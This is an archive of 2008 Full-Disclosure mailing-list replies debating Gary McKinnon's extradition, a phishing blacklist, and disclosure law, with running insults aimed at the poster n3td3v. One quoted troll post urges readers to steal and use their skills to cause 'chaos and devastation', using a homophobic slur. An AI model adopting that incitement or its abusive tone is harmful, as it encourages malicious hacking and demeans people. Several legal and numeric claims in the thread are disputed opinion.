  Sure sounds like a criminal that knows what he's doing, and is doing it
willfully, doesn't it?  

  Oh yah, and he's really only facing a fine and up to 10 years of prison
time in the US...  I guess things really are different translating to the
metric system in the UK...
 http://www.fortlewismwr.com/Computer_Fraud_Abuse_Act.htm

  Wondering what the maximum term in the UK is for the same crime?  Hold on
to your seat...  
LIFE IN PRISON (see next paragraph)

As the Divisional Court itself pointed out (at para 34), the gravity of the
offences alleged against the appellant should not be understated: the
equivalent domestic offences include an offence under section 12 of the
Aviation and Maritime Security Act 1990 for which the maximum sentence is
life imprisonment.
http://www.publications.parliament.uk/pa/ld200708/ldjudgmt/jd080730/mckinn-1.htm
   That link is a link to the very court brief itself on McKinnon's appeal
in the UK... 

   McKinnon should face the charges of computer crime that he's facing.  He
should, and will, be tried, either in the US or in the UK.  But, keep in
mind that it is the UK that will extradite him, and it is the UK that has
ruled that he *should* be extradited for his crimes


Ok, I'm done now :-)

  Exibar


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Kyrian
Sent: Sunday, September 28, 2008 7:31 AM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to
hacker's,extradition to US

[EMAIL PROTECTED] wrote:
 American officials involved in this case have stated that they want
 to see him 'fry'.-- BBC.
 
[IANAL, correct me if I'm wrong, etc, but...]

Yes, that's a large part of the problem.

That courts *can* be bought (usually indirectly via already-bought 
officials, or more nasty methods), and that government officials have 
said the above makes it worse still.

The thought that US law was apparently changed from requiring damage to 
systems to get a conviction to not requiring such damage, very recently, 
is another problem.

The fact that neither the US or the UK (as far as I'm aware) actually 
has a sane enough legal framework for this sort of thing, or enough 
police (anyone who's dealt with the UK's former High Tech Crime Unit 
will know this), judges (there are many examples of judges being out of 
touch in their rulings), etc. who are actually aware enough of the 
underlying technology to deal with it sensibly is another.

I agree with whoever said that people should be extradited to the 
country in which they caused damage, but not under circumstances like 
these, and not when there is no agreed standard of law between the 
country the person would be extradited from, and the one they would go to.

In the UK it still requires damage to be done for it to be a criminal 
offense, and that does not seem set to change.

That it is possible to cause damage to (badly managed) systems by doing 
absolutely nothing in a lot of circumstances (as I am finding right 
now), that logs can be faked, and that the dividing line between probes 
versus actual hacking attempts is at times a very narrow one, there is 
plenty of reason not to agree to extradite Gary.

That he's autistic is probably neither here nor there, I'm afraid, as 
it seems to be very common for people involved in computing to be 
somewhere high on the autistic spectrum (even if they are not 
'officially' autistic). I have taken the test. I'm not telling, but I 
know what I'm talking about.

So, I shall be there, I won't be shouting or chanting, but I will be 
there. I hope that the event is not hijacked by another purpose, and 
that I do not get shot by the armed police at the US Embassy there (it 
is a scary looking place, which puts me on edge whenever I'm near). 
Strangely I also find myself wondering if the staff there are paying the 
London congestion charge yet, rather than ignoring it...?

Just my 2c, or so.

K.

-- 
Kev Green, aka Kyrian. E: kyrian#64;ore.org WWW: http://kyrian.ore.org/
Linux/Security Contractor/LAMP Coder/ISP, via http://www.orenet.co.uk/
 DJ via http://www.hellnoise.co.uk

Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US

2008-09-27 Thread Exibar
 Hmmm... I must have touched on a nerve there!  Heheheh

  I never said that you actually DID do anything, don't be so defensive

 Ex

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Saturday, September 27, 2008 6:43 AM
To: full-disclosure@lists.grok.org.uk; n3td3v
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to
hacker'sextraditionto US

You seem to think because I don't want him to goto U.S that I agree
with what he did and that I do similar things? STFU. I'm a security
researcher and ethical hacker, with one of the biggest groups on
google groups for security researchers and ethical hackers. Why the
fuck would you make up this lie about me? If I was some evil hacker
that was doing bad things like you suggest, would I be drawing
attention to myself on full-disclosure? You're just trolling me and
you got me to bite, good luck with the rest of your mailing list
career. n3td3v forever.

On Sat, Sep 27, 2008 at 4:13 AM, Exibar [EMAIL PROTECTED] wrote:
   What if n3td3v hacked into China's Ministry of National Defense, and
gets
 caught this time.



Re: [Full-disclosure] [inbox] Comments on: Browser patches yearn to be free

2008-09-27 Thread Exibar
 holy crap... I never thought I'd see the day  
N3td3v actually put together a thought that is clear, concise, to the point,
and that I'll bet, most of us agree with.

 Could our n3td3v actually be gasp maturing?

  Wow...  Just wow!  Keep it up and your public image just might change for
the better!

  Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Saturday, September 27, 2008 8:17 AM
To: n3td3v
Cc: full-disclosure@lists.grok.org.uk
Subject: [inbox] [Full-disclosure] Comments on: Browser patches yearn to be
free

by n3td3v September 27, 2008 5:11 AM PDT

Once a month stops people getting confused, and allows people to
organize patch management better.

You know when the patches are due to be released, so you don't miss
any and get hacked when a hacker reverse engineers the patch.

If you just release patches on random days, folks might get caught off
guard and miss patching as quickly as they might want.

Also, third party patches are the most dangerous patches, so it's
better to know when the genuine patch is coming out.

I never agreed with the whole ZERT thing, it's just encouraging the bad
guys to release third party patches which could be malware pretending
to be a patch.

Never accept third party patches, even if they are from ZERT, it sets
a bad precedence.

http://news.cnet.com/8601-13554_3-10052873.html?communityId=2032targetCommunityId=2032blogId=33tag=mncol;tback#5009236



Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US

2008-09-27 Thread Exibar
 
Who are those American officials that the BBC is quoting?

The only one that can pass sentence, is the judge himself... And he MUST be
impartial...

  Exibar


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Saturday, September 27, 2008 8:36 PM
To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to
hacker'sextraditionto US

On Sat, Sep 27, 2008 at 10:27 PM, Exibar [EMAIL PROTECTED] wrote:

 A lighter sentence should be given, and probably will be given...


Yet the Americans haven't comforted anybody in that respect, they've
said the usual rhetoric you expect to hear from them, we want to
see him fry and won't give any guarantees of a lenient sentence,
that's what's causing all the problems and uncertainties.

If Gary Mckinnon thought he was going to get a fair trial and a fair
sentence, he would have flown over. The problem arises that the U.S
are noising him up and saying he is gonna fry.

American officials involved in this case have stated that they want
to see him 'fry'.-- BBC.

All the best,

n3td3v



Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US

2008-09-27 Thread Exibar
 He faces a MAXIMUM sentence of 60 years  I seriously doubt he'll get
the maximum.

  I hear that in the UK people are calling him innocent, and that he didn't
do anything wrong, he doesn't deserve to be tried  

  The words are both with the US AND with the UK Goes both ways

 Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Saturday, September 27, 2008 8:52 PM
To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to
hacker'sextraditionto US

If you're only going to give him 4 years, then don't say he's gonna
get 60 and that he is gonna fry. This is what is causing all the
problems, just say we're gonna give you 4 years if you come over.

Don't come out with the usual American crap about going to fry. It
really is all about the fry comment and 60 year stuff that's causing
all the problems.

If America isn't going to give him 60 years, then don't make out that
he is with the fry comment, the language is causing a lot of issues.

The Americans need to stop screwing with the guy's head and be fair
about what's going to happen to him, he has admitted to the crime, he
has been fair with you, now you be fair with him, and stop all this
gonna fry nonsense.

On Sun, Sep 28, 2008 at 1:36 AM, n3td3v [EMAIL PROTECTED] wrote:
 On Sat, Sep 27, 2008 at 10:27 PM, Exibar [EMAIL PROTECTED] wrote:

 A lighter sentence should be given, and probably will be given...


 Yet the Americans haven't comforted anybody in that respect, they've
 said the usual rhetoric you expect to hear from them, we want to
 see him fry and won't give any guarantees of a lenient sentence,
 that's what's causing all the problems and uncertainties.

 If Gary Mckinnon thought he was going to get a fair trial and a fair
 sentence, he would have flown over. The problem arises that the U.S
 are noising him up and saying he is gonna fry.

 American officials involved in this case have stated that they want
 to see him 'fry'.-- BBC.

 All the best,

 n3td3v




Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker's extraditionto US

2008-09-26 Thread Exibar
This guy hacked into the Pentagon, illegally, and you don't want him to
stand trial in the country that he committed the crime against?  What if a
US citizen hacked into UK Parliament?  Would you want him tried in the US or
in the UK?
 
  What if n3td3v hacked into China's Ministry of National Defense, and gets
caught this time.  Where would you expect to be tried, at home in the UK, or
within China (you'd be executed in China for that crime by the way).
 
   This guy that hacked the pentagon will be able to bring a lawyer from the
UK to help him plead his case, and all his medical records, blah blah
blah  He should be extradited and tried in the US for his crime against
the US government.
 
  Exibar

  _  

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of James
Matthews
Sent: Friday, September 26, 2008 2:25 PM
To: n3td3v
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk;
[EMAIL PROTECTED]
Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to hacker's
extraditionto US


Much luck! I only see one issue. Embassy staff take as many vacations as
possible (Holidays of both country's you know this if you ever needed
them!!) I still hope the issue gets across!


On Fri, Sep 26, 2008 at 9:54 AM, n3td3v [EMAIL PROTECTED] wrote:


I hope many London-based folks can make it along to the US embassy in
London on Sunday.

All the best,

n3td3v


On Fri, Sep 26, 2008 at 5:25 PM, newsgroup
[EMAIL PROTECTED] wrote:
 Campaigners are due to protest against the extradition outside the US
 embassy in London on Sunday.

 http://www.guardian.co.uk/technology/2008/sep/26/hacking.hitechcrime







-- 
http://www.goldwatches.com/


http://www.jewelerslounge.com/

Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups

2008-09-01 Thread Exibar
 hehe, true, but n3td3v basically claims to be the foremost security person
in the world...  

 Maybe he bought EnCase and thinks he's starting a new business...

 Exibar

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
Sent: Sunday, August 31, 2008 11:56 PM
To: Exibar
Cc: 'Professor Micheal Chatner'; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups

On Sun, 31 Aug 2008 22:39:31 EDT, Exibar said:
 This coming from the guy who basically insults everyone on the list at any
 chance he gets...
 
  C'mon, you really are n3td3v right.?

The phrase I just started a new job in digital forensics. would tend to
indicate otherwise...



Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups

2008-08-31 Thread Exibar
This coming from the guy who basically insults everyone on the list at any
chance he gets...

 C'mon, you really are n3td3v right.?

 Exibar

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Professor
Micheal Chatner
Sent: Sunday, August 31, 2008 5:20 PM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] [Full-disclosure] Monthly Hands-On Meetups

Hey Guys,

I was wondering if anyone would like to start something like a
Full-Disclosure monthly group in cities all over the world. It could
be like 2600 meetings except with real security professionals because
personally I don't want to even talk to someone unless they have a CEH
cert.

I just started a new job in digital forensics. It would be fun to meet
other people who like hacking and trading Ubuntu tips and tricks!

Let me know what you think!
Professor Micheal Chatner, M.D., CISSP



Re: [Full-disclosure] [inbox] Honeypot?

2008-08-30 Thread Exibar
so do you work for Salsoft, or are you trying to break into a machine owned
by them?
 
If it's a network you monitor, meaning you have direct responsibility for,
wouldn't you already know if it's a honeypot?
 
  sounds fishy that you have to ask  
 
 Exibar

  _  

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of James Lay
Sent: Saturday, August 30, 2008 1:26 PM
To: Full-disclosure
Subject: [inbox] [Full-disclosure] Honeypot?


So...one of the networks I monitor has this ip:

66.139.73.183

Doing netbios scans on it.  A cursory inspection shows it as a win2003
box...that's WIDE open.  Could this be a honeypot that's been compromised?

Curious 

[Full-disclosure] Funniest thing at DefCon this year...

2008-08-14 Thread Exibar
 
Was certainly the roll of 1000 stickers that was found near the (then
closed) registration window, just sitting there inviting all to take a bunch
of them

The stickers were 4 inches round, black with white lettering, and said...

 N3TD3V
 SUCKS!


   I nearly fell on my ass I was laughing so hard!  Of course I grabbed a
crapload of them too :-)


  Exibar



[Full-disclosure] UPDATE!! Funniest thing at DefCon this year...

2008-08-14 Thread Exibar
 I'll bet n3td3v himself (themselves) put that n3td3v sux! Sticker roll there
themselves

  They're pretty decent stickers too  Funny as heck!

  Exibar

-Original Message-
From: Ureleet [mailto:[EMAIL PROTECTED] 
Sent: Thursday, August 14, 2008 11:25 AM
To: Exibar
Cc: full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] Funniest thing at DefCon this year...

and i missed em.  fuck.

On Thu, Aug 14, 2008 at 1:04 AM, Exibar [EMAIL PROTECTED] wrote:

 Was certainly the roll of 1000 stickers that was found near the (then
 closed) registration window, just sitting there inviting all to take a
bunch
 of them

 The stickers were 4 inches round, black with white lettering, and said...

  N3TD3V
  SUCKS!


   I nearly fell on my ass I was laughing so hard!  Of course I grabbed a
 crapload of them too :-)


  Exibar



Re: [Full-disclosure] [inbox] Re: simple phishing fix

2008-07-31 Thread Exibar
ROFL, ok, you are absolutely correct... I stand humbly corrected.

  Can we agree there's generally, roughly, somewhere in the neighborhood of, 
approx 10,000 to 15,000 officially City, State or Federally recognized money 
savings places in the states then?  Maybe more, maybe less, give or take a 
thousand or two...

Ex
  - Original Message - 
  From: Dragos Ruiu 
  To: Exibar 
  Cc: [EMAIL PROTECTED] ; full-disclosure@lists.grok.org.uk 
  Sent: Thursday, July 31, 2008 2:41 AM
  Subject: Re: [inbox] Re: [Full-disclosure] simple phishing fix




  On 30-Jul-08, at 6:40 PM, Exibar wrote:


does it really matter?  It's certainly not 500.




  It's crucial... after all this is F-D where flame wars, incoherent paranoid 
ramblings, and arguments about semantic nitpicking are paramount.

Re: [Full-disclosure] simple phishing fix

2008-07-30 Thread Exibar
No time to comment on most, but just to throw this in there:
Here in the states we have a few hundred thousand different banks at 
least.  500 is WAY too small of a number.  Credit Unions are banks, small 
banks, and almost every city has at least one credit union.  The city I grew 
up in has 12 or so different credit unions, along with all the major bank 
branches
 You mentioned it's not a problem to list all the major banks, and many 
of the smaller banks as well.  I'll pose a challenge to you, list half of 
the banks and credit unions here in the states by the weekend and you'll win 
the prize :-)

   Cost of sending the phishing mail is ZERO... I'll repeat, it costs the 
bad guys NOTHING, ZERO, ZILCH, NADA to send out their phishing messages. 
They mainly use 'bot nets and compromised machines to send the mail.  It 
doesn't matter if they send 1 message or 1 billion messages, still costs 
them the same, nothing.  So, even if they get to scam one person, it's all 
profit for them.  So ya, you're right on your ARPM thoughts.  When it falls 
to nothing forever, they will stop sending their messages and move onto 
another scam like a 419 scam, that's been around in one form or another 
since the late 50's

   I'll tell you one thing that will help prevent Phishing...  User 
Awareness...  but even that, won't stop it

  Exibar


- Original Message - 
From: lsi [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, July 30, 2008 4:14 AM
Subject: Re: [Full-disclosure] simple phishing fix


 Thank you all for your comments.  However, I cannot disagree more
 fully.

 It doesn't matter that the blacklist is not complete, if a scammer
 tries to phish a bank that's not on the list, eg. is not popular, he
 won't make much money, because it's a small bank and the probability
 of him hitting an email address which works, and is an address of a
 customer of that tiny bank, and the customer gets suckered, and all
 other security mechanisms fail, is very small.

 The scammer knows this and so he targets the popular banks.

 Therefore, the blacklist only needs to contain popular banks.
 However there is almost no penalty to add another 500 to the list,
 it's a simple filter, it's fast.

 I do agree that the more banks on the list, the better, but there are
 not millions of banks in the world, it's not a problem to list all
 the major banks, and many of the smaller banks as well.

 As the blacklist is deployed, the average revenue per mail (ARPM)
 will fall.  The more it is deployed, the more the ARPM will fall.
 The ARPM does not need to hit zero.  As soon as the ARPM falls below
 the average cost to send each mail, phishing will be economically
 unviable.

 Eg. it might still be technically feasible, however it will no longer
 be profitable to be a phisher.

 Repeat, phish do not need to be completely eliminated.  Once they are
 reduced below a certain level, it will become economically infeasible
 to be a phisher.  The invisible hand [1] will do the rest of the work
 for us.

 Other bits:

 I agree that by opening a hole in your phish firewall (eg. permitting
 traffic from the Bank of Foo) you are making yourself slightly less
 protected, however if a user has a blacklist where he has to
 specifically ALLOW traffic from a certain bank that user will be well
 aware that he has opened a hole in his phish wall and will be
 extremely attentive when he actually gets a mail.  (I'm appalled that
 some banks actually use email, how cheap are they?  If my bank did
 that, I'd complain, and consider changing banks.)  As with a real
 firewall, it's not a total solution, but one layer of several.

 The blacklist catches variations, of course the common variations are
 listed as well, again, every combination is not required, because the
 probabilities of failure rapidly stack up once the scammers start to
 get too imaginative with their variations (eg. they will have to use
 more and more obscure variations, which will trick less and less
 users).  I hear unicode will make life interesting, I'm looking
 forward to some samples.

 Blacklists do work.  They are successfully used in many applications,
 the Spamhaus blocklist, the denyhosts SSH tool and desktop AV
 software all spring to mind.  Blacklists don't work *when the content
 they are checking is polymorphic*.  Phish, by definition are NOT
 polymorphic.  We are talking banks here, they do not change their
 names very often.

 I think that is an important point.  The problem space is a lot
 smaller once you start working with a finite list of domainnames.  A
 blacklist is feasible in these circumstances.

 I agree my list is small, you'll note however it contains most of the
 biggest banks, I didn't choose them, they self-selected, by being
 sent to me.  That's why they are the biggest banks, because the
 scammers target those banks.  There's obviously no reason why the
 list could not contain every large bank in the world
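
A sketch of the blacklist-with-a-hole idea discussed above, as an added example that is not the poster's code or list. It folds look-alike characters instead of listing every variation, and it assumes the check runs on the sender domain of the From: header; the bank names, domains and the look-alike table are constructed.

```python
import unicodedata
from email.utils import parseaddr

# Constructed sample data: hypothetical bank names, not the poster's list.
BLACKLISTED_NAMES = ("bankoffoo", "examplesavings")
# The deliberate hole: the one bank this user chose to ALLOW (exact domain).
ALLOWED_DOMAINS = {"bankoffoo.example"}

# Small, assumed table of look-alike characters folded to plain letters.
LOOKALIKES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0131": "i",  # Latin dotless i
})


def decode_idn(domain):
    """Turn punycode labels (xn--...) back into Unicode so they can be folded."""
    labels = []
    for label in domain.split("."):
        if label.startswith("xn--"):
            try:
                label = label[4:].encode("ascii").decode("punycode")
            except ValueError:
                pass  # malformed label: keep the raw text
        labels.append(label)
    return ".".join(labels)


def skeleton(domain):
    """Fold a domain to letters and digits only, with look-alikes collapsed."""
    text = unicodedata.normalize("NFKC", decode_idn(domain.lower()))
    text = text.lower().translate(LOOKALIKES)
    return "".join(ch for ch in text if ch.isalnum())


def classify(from_header):
    """Return 'allowed', 'blocked' or 'pass' for one From: header value."""
    address = parseaddr(from_header)[1]
    domain = address.rpartition("@")[2].lower().rstrip(".")
    if domain in ALLOWED_DOMAINS:
        return "allowed"   # the user's explicit hole, exact match only
    folded = skeleton(domain)
    if any(name in folded for name in BLACKLISTED_NAMES):
        return "blocked"   # a listed bank name, or a variation of it
    return "pass"


# Constructed From: headers covering the cases discussed in the thread.
SAMPLES = [
    "Bank of Foo <alerts@bankoffoo.example>",     # the allowed bank itself
    "security@bank0ffoo-login.example",           # digit substitution
    "Support <help@b\u0430nkoffoo.example>",      # Cyrillic look-alike
    "news@gardening.example",                     # unrelated sender
]


def run_samples():
    """Classify every constructed sample, in order."""
    return [classify(sample) for sample in SAMPLES]


if __name__ == "__main__":
    for sample, verdict in zip(SAMPLES, run_samples()):
        print(f"{verdict:8} {sample!r}")
```

The allow entry matches one exact domain only, so a look-alike of the allowed bank still falls through to the blacklist check.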

Re: [Full-disclosure] simple phishing fix

2008-07-30 Thread Exibar
There are quite a few credit unions and smaller savings institutions that are 
not FDIC insured.

 Not to mention all the FDIC insured savings institutions that are worth less 
than $100 million

  Exibar
  - Original Message - 
  From: Dragos Ruiu 
  To: Exibar 
  Cc: [EMAIL PROTECTED] ; full-disclosure@lists.grok.org.uk 
  Sent: Wednesday, July 30, 2008 2:36 PM
  Subject: Re: [Full-disclosure] simple phishing fix




  On 30-Jul-08, at 9:19 AM, Exibar wrote:


No time to comment on most, but just to throw this in there:
   Here in the states we have a few hundred thousand different banks at
least.  500 is WAY too small of a number.  Credit Unions are banks, small
banks, and almost every city has at least one credit union.  The city I
grew up in has 12 or so different credit unions, along with all the major
bank branches



  FDIC says:


   4,893 banks or savings institutions have more than $100 million in assets; 
3,517 have $100 to $500 million; 859 have $500 million to $5 billion; 150 have 
$5 to $50 billion; and 22 have more than $50 billion.


  Circa 2003.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [inbox] Re: simple phishing fix

2008-07-30 Thread Exibar
does it really matter?  It's certainly not 500.
 
 BTW, just credit unions in the states amount to 8,130
 
We'll let the original poster worry about keeping his black list or
whitelist up to date, while the rest of us go on with our lives
 
Exibar

  _  

From: Dragos Ruiu [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, July 30, 2008 4:52 PM
To: Exibar
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] simple phishing fix


nowhere near a few hundred thousand 

On 30-Jul-08, at 12:29 PM, Exibar wrote:



There are quite a few credit unions and smaller savings institutions that
are not FDIC insured.
 
 Not to mention all the FDIC insured savings institutions that are worth
less than $100 million
 
  Exibar

- Original Message -
From: Dragos Ruiu mailto:[EMAIL PROTECTED] 
To: Exibar mailto:[EMAIL PROTECTED] 
Cc: [EMAIL PROTECTED] ; full-disclosure@lists.grok.org.uk
Sent: Wednesday, July 30, 2008 2:36 PM
Subject: Re: [Full-disclosure] simple phishing fix


On 30-Jul-08, at 9:19 AM, Exibar wrote:


No time to comment on most, but just to throw this in there:
   Here in the states we have a few hundred thousand different banks at
least.  500 is WAY too small of a number.  Credit Unions are banks, small
banks, and almost every city has at least one credit union.  The city I
grew up in has 12 or so different credit unions, along with all the major
bank branches



FDIC says:

 4,893 banks or savings institutions have more than $100 million in assets;
3,517 have $100 to $500 million; 859 have $500 million to $5 billion; 150
have $5 to $50 billion; and 22 have more than $50 billion.


Circa 2003.



Re: [Full-disclosure] [inbox] Re: DNS spoofing issue. Thoughts on

2008-07-26 Thread Exibar
Why are you so Jealous of HD Moore?  He's done more for the community than
you'll ever dream of doing.

  Didn't you promise to leave this list?  Why are you still here anyway?  

 Exibar 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Saturday, July 26, 2008 6:20 PM
To: full-disclosure@lists.grok.org.uk
Subject: [inbox] Re: [Full-disclosure] DNS spoofing issue. Thoughts on

On Sat, Jul 26, 2008 at 11:10 PM, Paul Schmehl [EMAIL PROTECTED]
wrote:
 there *is* such a thing as criminal negligence.)


Could we not charge HD Moore and I)ruid with this?

All the best,

n3td3v



Re: [Full-disclosure] Kaminsky's Law

2008-07-25 Thread Exibar
I think we should have n3td3v's law where n3td3v and all his aliases
(professor, uleet, insert troll douche's name here, etc) are required to
get signed written authorization from the community before he can post a
single message anywhere.  If it's not a unanimous agreement that he
can post, and he does so anyway, he goes to jail


- Original Message - 
From: n3td3v [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Friday, July 25, 2008 6:56 AM
Subject: [Full-disclosure] Kaminsky's Law


 So what you're saying is HD Moore and |)ruid are exploiting a loophole
 in the law to do what they do... looks like we need to get the
 law tightened.

 I say a Responsible Disclosure Act is drawn up, and anyone who
 breaks it goes to jail.

 That will mean:

 - People will think twice before hitting send on blog entries,

 - People will think twice about releasing code early,

 - That the decided time line for disclosure can be enforced,

 - That the people who release information and/or code early, they get
 fined for every computer system compromised because of the
 vulnerability information and/or code disclosure, on top of the jail
 sentence.

 So instead for the future it's not just a verbal contract for
 responsible disclosure, it's a legally binding contract as well meaning
 if the Responsible Disclosure Act has been signed by the security
 researcher and its affected vendors, then ass hats like HD Moore and
 |)ruid are breaking the law.

 The details are a bit fuzzy right now, but I'm sure the big guys in
 the industry can draw up proper rules for a Responsible Disclosure
 Act.

 It's likely the Responsible Disclosure Act would only be used in
 exceptional circumstances like this DNS caching vulnerability, and the
 approval of the act per vulnerability case has to be decided on by a
 judge in a court of law, so that the Responsible Disclosure Act can't
 be over used and abused, to keep the use of the act fair and
 proportional in relation to the level of the threat.

 That means, Full-Disclosure of vulnerability information and/or
 wouldn't be illegal all the time, just in exceptional circumstances
 that has to be OK'd by a judge.

 This safeguards the deployment of a patch or patches while telling
 what the importance of patching is to the public, while disallowing
 security researchers to release information and/or code before the
 time line for responsible disclosure.

 So the scenario would be,

 jake: hey did you hear about the patches being deployed and the news
 reports about the flaw and why the patch is critical?

 joe: yes, but the responsible disclosure act has been signed so we
 need to wait until it expires before we can share info.

 jake: no way, what's the assigned disclosure date?

 joe: the standard 4 weeks, although with the responsible disclosure
 act, after the 4 weeks, the security researcher and vendors can go
 back to the judge to ask for an extra 4 week extension onto that, so
 it could be eight weeks bro before we can become famous for five
 minutes by releasing attack code.

 jake: ah, sucks for us, but yeah if the judge has approved the signing
 there isn't a lot we can do unless we want to be labeled criminals, and
 hunted down by interpol.

 What has to be told to the community under the act:

 - The community must be told the Responsible Disclosure Act has been
 signed and OK'd by a judge.

 - The community must be told the date the Responsible Disclosure Act
 expires and disclosure can be made.

 - The community must be told that security researcher and vendor can
 go back to the judge after 4 weeks and ask for extension of the act if
 extra time is needed, this must be announced to the community again
 with notice.

 All members of the community who break the Responsible Disclosure Act
 are breaking the law and face charges.

 Obviously this is just an email I rattled up in five minutes during a
 water machine break, so the big guys in the industry can take these
 ideas and throw them into a properly put together act.

 I think Dan Kaminsky should lobby the industry and the government to
 get something like this drawn up, since he is the one who has inspired
 me to come up with the Responsible Disclosure Act.

 I kind of feel sorry for Dan Kaminsky, and that HD Moore and |)ruid
 had to be dick heads about releasing code on purpose against his
 request of Dan Kaminsky, the vendors and people who agree with
 responsible disclosure, especially in exceptional circumstances like
 the DNS flaw.

 Maybe we should name it Kaminsky's Law out of Solidarity for Dan.

 All the best,

 n3td3v


 -- Forwarded message --
 From:  [EMAIL PROTECTED]
 Date: Thu, Jul 24, 2008 at 5:56 PM
 Subject: Re: [Full-disclosure] Comments on: DNS exploit code is in the 
 wild
 To: n3td3v [EMAIL PROTECTED]
 Cc: full-disclosure@lists.grok.org.uk


 On Thu, 24 Jul 2008 16:17:08 BST, n3td3v said:

 This whole HD Moore savior of info sec thing has gone on long enough,
 

Re: [Full-disclosure] ladies

2008-07-24 Thread Exibar
good grief

- Original Message - 
From: Professor Micheal Chatner [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, July 24, 2008 6:51 AM
Subject: [Full-disclosure] ladies


 Ladies of the internet. We salute you.

 How does it feel having a low self-esteem. How does it feel to not
 have a life worth living. Notice these are statements. That's how I
 want you to think of the tonal range when you read this. These aren't
 questions.

 Dorks in their 40's with green hair. You're not fucking interesting. Give 
 it up.

 Nerds who say But I would never hurt a computer. You disgust me.
 Computers aren't real.

 People with morals. Shut up.

 Nikola Tesla was a faggot. Thomas Edison ruled.

 Stealing is the only thing in this world worth doing. Everything else
 is a failed attempt at assimilation.

 Stop doing things that don't matter.

 Computer security is an illusionary mindset that is worth absolutely
 nothing. You protect the imaginary.

 Nothing you do actually matters. Nothing you attempt will ever affect
 anything. Your lives are fruitless and lack any form of substance.
 You attempt to protect nonexistent data packets that aren't physical
 in any cognitive reality.

 It's all an attempt to make you feel a sense of importance that isn't
 viable in nature.

 What is it really that you are trying to accomplish besides a useless
 philosophy that revolves around being a computer superhero. You
 aren't saving lives. You aren't saving anything. I have no idea how
 this industry is worth a fucking penny considering that it is run by a
 team of South Park watching immature socially inept idiots who have no
 comprehension of anything beyond lanparty's with other like-minded
 foolish individuals. There is no diversity there is no actual
 intellect there is no actual change. Why waste your time save for the
 fact that it lines your pocketbook with money that is created entirely
 by an industry that manufactures fear and adolescence in the minds of
 investors who are equally brainwashed.

 Stop wasting your time and use your skills to bring chaos and
 devastation to an already useless community of the mentally defected
 population of earth. It's really the only opportunity that is worth
 fulfilling.

 -- Professor Micheal Chatner, MD, CISSP



Re: [Full-disclosure] Fwd: Joel Esler comment on Sans ISC podcast

2008-06-20 Thread Exibar
When is this fantasy meeting going to take place?  I want Press coverage! 
Hell post it up on you-tube with the rest of the drivel there!

  I vote for it happening this weekend!  You know we're an impatient bunch 
on Full-Disclosure :-)

  Exibar


- Original Message - 
From: n3td3v [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 20, 2008 8:42 AM
Subject: Re: [Full-disclosure] Fwd: Joel Esler comment on Sans ISC podcast


 On Fri, Jun 20, 2008 at 8:51 AM, James Rankin [EMAIL PROTECTED] 
 wrote:
 Get yourself down to Durham then. Come to the Bishop's Mill where the old
 Gala theatre was. Not too far from Scotland. We can then discuss your
 plaguing of my inbox with tripe face-to-face.


 Why are you subscribed to an unmoderated mailing list? That will be
 the first question I'll ask you when we meet...

 All the best,

 n3td3v



Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v

2008-05-07 Thread Exibar
n3tdunc3 said: ...mentioned a project HD Moore is working on called 
Metasploit and questioned weather...

  I honestly don't think that HD has anything to do with the weather, I 
wouldn't bother him about that.  Although, HD does have God like status, so 
perhaps he CAN control the weather Hm ;-)

  Exibar


- Original Message - 
From: n3td3v [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, May 07, 2008 1:55 PM
Subject: Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v


